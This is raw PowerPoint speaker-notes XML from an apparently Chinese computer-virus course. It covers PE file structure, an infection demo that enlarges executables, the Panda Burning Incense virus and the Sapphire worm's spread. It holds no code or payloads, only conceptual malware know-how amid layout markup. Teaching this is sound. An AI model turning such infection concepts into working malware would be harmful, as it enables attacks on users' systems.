              <a:t>字样的签名，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件头（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IMAGE_FILE_HEADER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可选头（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IMAGE_OPTIONAL_HEADER32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>节表：是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件后续节的描述，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据节表的描述加载每个节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>节：每个节实际上是一个容器，可以包含代码、数据等等，</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74756" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{741ED501-07AC-42BE-8E4F-8BC7DA742DE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B15E7C4-DA26-4BF0-9D4F-FF8FF80F0561}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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81504BD3-E78F-47CF-9377-F624E956CAB9}"/>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D1723716-E00B-4881-9EC7-E7A62C70D2D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375B985D-B6C6-4117-8692-0E6ED9DDA5B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4699714-B42D-474E-ACDB-A71FEED35ED2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{450D3C9D-B335-4B9A-9FBC-07B14E257C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1E228A-7493-4C72-BF08-C8501EB469B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4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACC2450A-7CA9-4354-8E71-6D39465B002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3692CB8A-C73F-49AD-B765-0BD0CF87F342}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1512703-38E5-44E7-91CE-15E761FFB92F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BC2085E-E8B8-409D-B3C0-533F7731FBE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件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Insert.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大小成为了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>24KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Xmu.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成为了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>18KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。它们的字节数增加了，其它两个可执行文件大小没有变化，运行也没有感染。可见，该种感染方式修改了可执行文件大小。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80900" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D92CBE0D-653C-4DBC-9881-B9EC65EC202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4E4E6D4-6D71-4848-9129-12F7A249820D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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6BA8E51A-8F85-4D00-85B2-0E016E511CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{707AD385-A194-4F58-8C98-E9BB6792FEF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8" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A59DFBC-70F4-46FF-88A7-C5ADC18577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6B840B5-59A7-4A74-BDF1-0821948ACCA5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DEB0774-36C5-4912-8712-22F083BFFD23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63A94B7-34ED-41AB-8393-C75B91A316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4996" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534F9E1C-F9DA-493E-A872-345CFEB556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07B6256-1707-4C00-AD6E-BCA09CCB05F2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C16874D-61A0-4E89-ADCB-B4A69DC2A7E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC265553-EA17-4206-8C7B-A8A98507DA6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7044" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32EB79A9-FD60-4C3B-B5EA-62131E8939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D1AFF7F-CB96-4AF4-BB1E-718B43438C89}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E5087B3-20A3-43E9-89D7-703794A30502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4390E9EF-47F0-4001-9AC7-BB07EECBA6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2" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C8CB83-7AB0-4B45-BB9C-09CB3D18BE7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80F97AE-5E9C-4EC7-9FB1-9530BB15B424}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1584FAE-833B-406C-8160-B9302E4EE829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A82C86B-2051-449A-A421-37A9DAA3B87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0" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A207F988-0023-492F-94FF-CA2D6324026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B8AAC5D-7EED-4DBF-9C4B-E6177B3FDDA1}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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0B1C5E4D-F8D4-46D3-A5D1-2A50E176B3ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C340F38E-909C-4A9C-AFC6-D9FFE818C57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熊猫烧香病毒：将原始文件抽离</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Delphi</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900BF847-6E60-4255-A30F-33C8BD61BD5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157C0CA-90E4-42AE-A1F6-5B8D0AA22506}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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384D46B0-4091-4326-9B8C-4192CE34C7EC}"/>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24C404B0-7E79-476C-A904-7AFDBBE9F77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熊猫烧香病毒：将原始文件抽离</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F93299D-CA08-430F-AEE9-013F4EB604A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1A0A7CBD-81AE-4718-A434-80F9E35C4F6C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B27ADA55-C1B1-4904-8E3F-1C8CD587AA66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130051" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEBA5CD5-7561-4D7E-A7BA-D5732E959E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0052" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56ACDA6E-83C6-4F5E-8C2B-665C2659D9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203A75C-2AC5-44A5-9B0A-40E4F7AB61BA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31589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16CBDB24-2ED9-4DB8-8AE7-28D68B16A925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15EDD9E4-D0E0-451B-AC98-7C6BDEEB54F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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B599ED98-23E1-4D6B-A93B-654FE1B4CF5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6A17487-BBF7-496D-9860-C4937A014F54}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D043AC1C-7477-4C22-A4AF-2C3DE34DF673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132099" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA63E73B-8B70-407A-9FB8-B76B433DCDA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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132100" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF72B0EF-394A-46CD-84CA-D8BAFB3B60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9B0F6FF-4AE4-4630-AD5F-1E7D3C5A1154}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1912736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1B715C84-DB92-460C-9560-DEF690E07A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AABE82-2A2A-4D01-B841-EDC06CD095A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476" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01FB0D6B-CD00-45BB-A5EC-CEF2DE11144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02474C9-837D-4461-8485-4F9C668796B2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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C0F0814-F375-4B63-8F5A-B9087699A934}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3961140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C0F0814-F375-4B63-8F5A-B9087699A934}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4249970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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8A9B50-C32B-419B-A6F5-B43E983F1767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110595" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A721C1C-B3B6-4100-9DF6-DFEC515B7D3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t>Jmicron:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>智微</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Realtek :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>瑞昱 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>台湾半导体公司</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110596" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD30C2A9-C1B0-4623-A731-A0E8A76EC3D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7EF23CB-47BF-4387-8AD1-8A09F2A195C3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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5CB750CE-AC97-454A-8129-C0785E853C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652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95679C1-F581-4A2B-812C-DF94049456A3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112643" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEAC14A0-1DEA-4901-A01A-3F187146753F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993775" y="768350"/>
            <a:ext cx="5113338" cy="3835400"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112644" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353DF13-430C-4CE2-82B5-3B8E86C7C2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Before January 25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="30000"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>, this talk contains a considerable amount of motivation as to why fast Internet worms are a potential threat.  They are now a real threat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>In the first 30 minutes of Sapphire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>s spread, we recorded nearly 75,000 unique infections.  Most of these infections actually occurred within 10 minutes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
